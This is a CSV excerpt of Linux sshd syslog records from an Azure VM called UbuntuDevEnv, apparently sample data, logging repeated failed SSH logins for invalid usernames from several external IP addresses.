+16426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:09:05,UbuntuDevEnv,2019-06-26 07:09:05,auth,UbuntuDevEnv,info,Failed password for invalid user himanshu from 64.202.187.152 port 38468 ssh2,39051,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,himanshu,64.202.187.1,38468,,
+16427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:09:06,UbuntuDevEnv,2019-06-26 07:09:05,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 38468:11: Bye Bye [preauth],39051,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,38468,,
+16428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:09:06,UbuntuDevEnv,2019-06-26 07:09:05,auth,UbuntuDevEnv,info,Disconnected from invalid user himanshu 64.202.187.152 port 38468 [preauth],39051,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,himanshu,64.202.187.1,38468,,
+16429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:09:52,UbuntuDevEnv,2019-06-26 07:09:52,auth,UbuntuDevEnv,info,Invalid user jenkins from 87.101.240.10 port 52208,39217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,87.101.240.1,52208,,
+16430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:09:52,UbuntuDevEnv,2019-06-26 07:09:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,39217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:09:52,UbuntuDevEnv,2019-06-26 07:09:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:09:54,UbuntuDevEnv,2019-06-26 07:09:54,auth,UbuntuDevEnv,info,Failed password for invalid user jenkins from 87.101.240.10 port 52208 ssh2,39217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,87.101.240.1,52208,,
+16433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:09:54,UbuntuDevEnv,2019-06-26 07:09:54,auth,UbuntuDevEnv,info,Disconnected from invalid user jenkins 87.101.240.10 port 52208 [preauth],39217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,87.101.240.1,52208,,
+16434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:09:54,UbuntuDevEnv,2019-06-26 07:09:54,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 52208:11: Bye Bye [preauth],39217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,52208,,
+16435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:21,UbuntuDevEnv,2019-06-26 07:10:20,auth,UbuntuDevEnv,info,Invalid user admin from 138.68.29.52 port 48938,39327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,138.68.29.5,48938,,
+16436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:21,UbuntuDevEnv,2019-06-26 07:10:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,39327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:21,UbuntuDevEnv,2019-06-26 07:10:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:23,UbuntuDevEnv,2019-06-26 07:10:23,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 138.68.29.52 port 48938 ssh2,39327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,138.68.29.5,48938,,
+16439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:23,UbuntuDevEnv,2019-06-26 07:10:23,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 138.68.29.52 port 48938 [preauth],39327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,138.68.29.5,48938,,
+16440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:23,UbuntuDevEnv,2019-06-26 07:10:23,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 48938:11: Bye Bye [preauth],39327,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,48938,,
+16441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:27,UbuntuDevEnv,2019-06-26 07:10:26,auth,UbuntuDevEnv,info,Invalid user nrpe from 206.189.118.156 port 38994,39353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nrpe,206.189.118.1,38994,,
+16442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:27,UbuntuDevEnv,2019-06-26 07:10:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:27,UbuntuDevEnv,2019-06-26 07:10:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,39353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:29,UbuntuDevEnv,2019-06-26 07:10:29,auth,UbuntuDevEnv,info,Failed password for invalid user nrpe from 206.189.118.156 port 38994 ssh2,39353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nrpe,206.189.118.1,38994,,
+16445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:29,UbuntuDevEnv,2019-06-26 07:10:29,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 38994:11: Bye Bye [preauth],39353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,38994,,
+16446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:29,UbuntuDevEnv,2019-06-26 07:10:29,auth,UbuntuDevEnv,info,Disconnected from invalid user nrpe 206.189.118.156 port 38994 [preauth],39353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nrpe,206.189.118.1,38994,,
+16447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:38,UbuntuDevEnv,2019-06-26 07:10:38,auth,UbuntuDevEnv,info,Invalid user fe from 64.202.187.152 port 55902,39393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fe,64.202.187.1,55902,,
+16448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:38,UbuntuDevEnv,2019-06-26 07:10:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,39393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:38,UbuntuDevEnv,2019-06-26 07:10:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:41,UbuntuDevEnv,2019-06-26 07:10:40,auth,UbuntuDevEnv,info,Failed password for invalid user fe from 64.202.187.152 port 55902 ssh2,39393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fe,64.202.187.1,55902,,
+16451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:41,UbuntuDevEnv,2019-06-26 07:10:40,auth,UbuntuDevEnv,info,Disconnected from invalid user fe 64.202.187.152 port 55902 [preauth],39393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fe,64.202.187.1,55902,,
+16452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:41,UbuntuDevEnv,2019-06-26 07:10:40,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 55902:11: Bye Bye [preauth],39393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,55902,,
+16453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:45,UbuntuDevEnv,2019-06-26 07:10:45,auth,UbuntuDevEnv,info,Invalid user hank from 46.101.149.230 port 44338,39406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hank,46.101.149.2,44338,,
+16454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:45,UbuntuDevEnv,2019-06-26 07:10:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:45,UbuntuDevEnv,2019-06-26 07:10:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,39406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:48,UbuntuDevEnv,2019-06-26 07:10:47,auth,UbuntuDevEnv,info,Failed password for invalid user hank from 46.101.149.230 port 44338 ssh2,39406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hank,46.101.149.2,44338,,
+16457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:48,UbuntuDevEnv,2019-06-26 07:10:47,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 44338:11: Bye Bye [preauth],39406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,44338,,
+16458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:10:48,UbuntuDevEnv,2019-06-26 07:10:47,auth,UbuntuDevEnv,info,Disconnected from invalid user hank 46.101.149.230 port 44338 [preauth],39406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hank,46.101.149.2,44338,,
+16459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:49,UbuntuDevEnv,2019-06-26 07:11:49,auth,UbuntuDevEnv,info,Invalid user owen from 138.68.29.52 port 38024,39638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,owen,138.68.29.5,38024,,
+16460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:49,UbuntuDevEnv,2019-06-26 07:11:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:49,UbuntuDevEnv,2019-06-26 07:11:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,39638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:51,UbuntuDevEnv,2019-06-26 07:11:50,auth,UbuntuDevEnv,info,Failed password for invalid user owen from 138.68.29.52 port 38024 ssh2,39638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,owen,138.68.29.5,38024,,
+16463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:51,UbuntuDevEnv,2019-06-26 07:11:50,auth,UbuntuDevEnv,info,Disconnected from invalid user owen 138.68.29.52 port 38024 [preauth],39638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,owen,138.68.29.5,38024,,
+16464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:51,UbuntuDevEnv,2019-06-26 07:11:50,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 38024:11: Bye Bye [preauth],39638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,38024,,
+16465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:55,UbuntuDevEnv,2019-06-26 07:11:54,auth,UbuntuDevEnv,info,Invalid user admin from 206.189.118.156 port 56444,39662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,206.189.118.1,56444,,
+16466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:55,UbuntuDevEnv,2019-06-26 07:11:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:55,UbuntuDevEnv,2019-06-26 07:11:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,39662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:56,UbuntuDevEnv,2019-06-26 07:11:56,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 206.189.118.156 port 56444 ssh2,39662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,206.189.118.1,56444,,
+16469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:56,UbuntuDevEnv,2019-06-26 07:11:56,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 206.189.118.156 port 56444 [preauth],39662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,206.189.118.1,56444,,
+16470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:56,UbuntuDevEnv,2019-06-26 07:11:56,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 56444:11: Bye Bye [preauth],39662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,56444,,
+16471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:57,UbuntuDevEnv,2019-06-26 07:11:56,auth,UbuntuDevEnv,info,Invalid user ubuntu from 87.101.240.10 port 41224,39666,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,87.101.240.1,41224,,
+16472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:57,UbuntuDevEnv,2019-06-26 07:11:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39666,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:57,UbuntuDevEnv,2019-06-26 07:11:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,39666,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:59,UbuntuDevEnv,2019-06-26 07:11:58,auth,UbuntuDevEnv,info,Failed password for invalid user ubuntu from 87.101.240.10 port 41224 ssh2,39666,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,87.101.240.1,41224,,
+16475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:59,UbuntuDevEnv,2019-06-26 07:11:59,auth,UbuntuDevEnv,info,Disconnected from invalid user ubuntu 87.101.240.10 port 41224 [preauth],39666,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ubuntu,87.101.240.1,41224,,
+16476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:11:59,UbuntuDevEnv,2019-06-26 07:11:59,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 41224:11: Bye Bye [preauth],39666,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,41224,,
+16477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:12:10,UbuntuDevEnv,2019-06-26 07:12:09,auth,UbuntuDevEnv,info,Invalid user token from 64.202.187.152 port 45104,39717,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,token,64.202.187.1,45104,,
+16478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:12:10,UbuntuDevEnv,2019-06-26 07:12:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39717,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:12:10,UbuntuDevEnv,2019-06-26 07:12:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,39717,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:12:12,UbuntuDevEnv,2019-06-26 07:12:11,auth,UbuntuDevEnv,info,Failed password for invalid user token from 64.202.187.152 port 45104 ssh2,39717,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,token,64.202.187.1,45104,,
+16481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:12:12,UbuntuDevEnv,2019-06-26 07:12:11,auth,UbuntuDevEnv,info,Disconnected from invalid user token 64.202.187.152 port 45104 [preauth],39717,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,token,64.202.187.1,45104,,
+16482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:12:12,UbuntuDevEnv,2019-06-26 07:12:11,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 45104:11: Bye Bye [preauth],39717,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,45104,,
+16483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:12:51,UbuntuDevEnv,2019-06-26 07:12:51,auth,UbuntuDevEnv,info,Invalid user arshad from 46.101.149.230 port 33236,39859,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arshad,46.101.149.2,33236,,
+16484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:12:51,UbuntuDevEnv,2019-06-26 07:12:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39859,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:12:51,UbuntuDevEnv,2019-06-26 07:12:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,39859,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
